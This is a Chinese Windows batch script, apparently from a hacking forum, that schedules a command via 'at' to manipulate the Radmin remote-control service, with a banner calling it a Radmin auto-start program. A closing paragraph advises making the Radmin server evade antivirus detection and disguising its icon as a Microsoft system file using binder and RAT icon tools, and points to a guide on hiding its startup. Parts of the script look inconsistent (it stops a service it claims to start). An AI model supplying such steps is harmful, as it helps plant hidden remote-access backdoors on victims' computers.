echo 正在查询本机的当前时间
echo.
net time //127.0.0.1 /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do
set /a hh=%%i & set /a mm=%%j
echo %1当前时间为%hh%:%mm%
set /a mm=%mm%+2
if /i %mm% geq 60 set /a mm=0 & set /a hh=%hh%+1

if /i %hh% geq 24 set /a hh=0
set tm=%hh%:%mm%
echo.
echo 设置启动AT命令运行的时间为%tm%
echo.
at //127.0.0.1 %tm% net stop r_server
Rem
========================完=============================


echo
======================================================
echo 魔女の条件---Radmin自启动程序

echo 黑客基地 www.hackbase.com
echo
======================================================
echo 最多再过120秒,Radmin服务就会被启动,请稍侯...
echo 请明智地使用,否则可能导致民事或刑事处罚!
echo 欢迎到黑客基地论坛发表高见或者用QQ联系偶!
echo
echo 版权所有:魔女の条件
echo QICQ:9500142
echo E-mail:[email protected]
echo
------------------------------------------------------


在配置Radmin服务端的时候除了对程序的免查杀处理,还有对其程序图标作下修改,建议使用剑鹰文件合并器或用灰鸽子图标修改器修改成微软系统内部图标。对于Radmin启动隐藏请参见《黑客X档案》第九期《Radmin之自启动》,风写的这个自启动方法很有见地。

你可能感兴趣的:(网络安全-入侵实例,windows,user,server,杀毒软件,sql,server,cmd)